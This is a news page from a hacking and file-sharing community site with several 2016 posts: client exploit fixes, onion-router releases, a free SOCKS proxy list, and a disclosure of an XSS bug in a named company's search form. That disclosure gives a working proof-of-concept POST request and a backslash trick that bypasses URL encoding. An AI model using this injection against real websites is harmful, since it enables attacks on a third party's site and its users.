This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
Русский, Россия Svenska, Sverige
RSS
18.97.9.171.US.SSL
News News Work Work Network Network Forum Forum Gallery Gallery Hublist Hublist Tools Tools Statistics Statistics About About Login Login

Another NMDC exploit fix: ApexDC++ 1.6.2

ApexDC++
Finally, after a couple of years, ApexDC++ developers have fixed the NMDC search exploit that I was speaking about earlier. Everyone should update to latest version 1.6.2. Now I also can say that only StrongDC++ is left of all the popular clients. good
Posted by RoLex on 2016-05-28 19:01 0 comments 9 likes

Advanced Onion Router AdvOR 0.3.0.23

Due to new OpenSSL vulnerabilities the library was updated to latest version 1.0.2h.

Changes in 0.3.0.23
- the OpenSSL library was updated to openssl-1.0.2h
- geoip_c.h was updated with GeoIPCountryWhois.csv released on May 3'rd; there are 121733 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries

File information: AdvOR 0.3.0.23
Posted by advor on 2016-05-14 13:56 4 comments 12 likes

Technicolor.com search form XSS bug

Vulnerable page: http://www.technicolor.com/search/

In order to reproduce the bug, you have to replace any forward slash / with backslash \ because forward slash is being URL encoded.

PoC
POST /search/ HTTP/1.1
Host: www.technicolor.com
search_block_form=<img src=http:\\te-home.net\gallery\xssd_by_teamelite.png>

You can either include any XSS code in search input box, or request any XSS code directly using POST method and search_block_form parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-05-08 22:41 1 comment 7 likes

Advanced Onion Router AdvOR 0.3.0.22

Changes in 0.3.0.22
- geoip_c.h was updated with GeoIPCountryWhois.csv released on April 5'th; there are 120651 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries

File information: AdvOR 0.3.0.22
Posted by advor on 2016-04-12 15:21 1 comment 5 likes

Daily free list of SOCKS proxies now available

Just wanted to let you know that we have added a SOCKS tool to our online tools collection. It displays list of daily updated SOCKS of versions 5 and 4. Feel free to bookmark this page for your daily free list of SOCKS proxies. In order to get parsed plain text list of SOCKS you need to submit the security code on that page. Please note that any frequent sniff attempts will trigger flood detection and cause source address to get banned at firewall level. okey
Posted by RoLex on 2016-04-11 01:15 3 comments 10 likes
202122232425262728
18.97.9.171.US.SSL Copyright © 2002-2025 Team Elite ⋅ All rights reserved ⋅ CookiesHelpContact 2 862 0740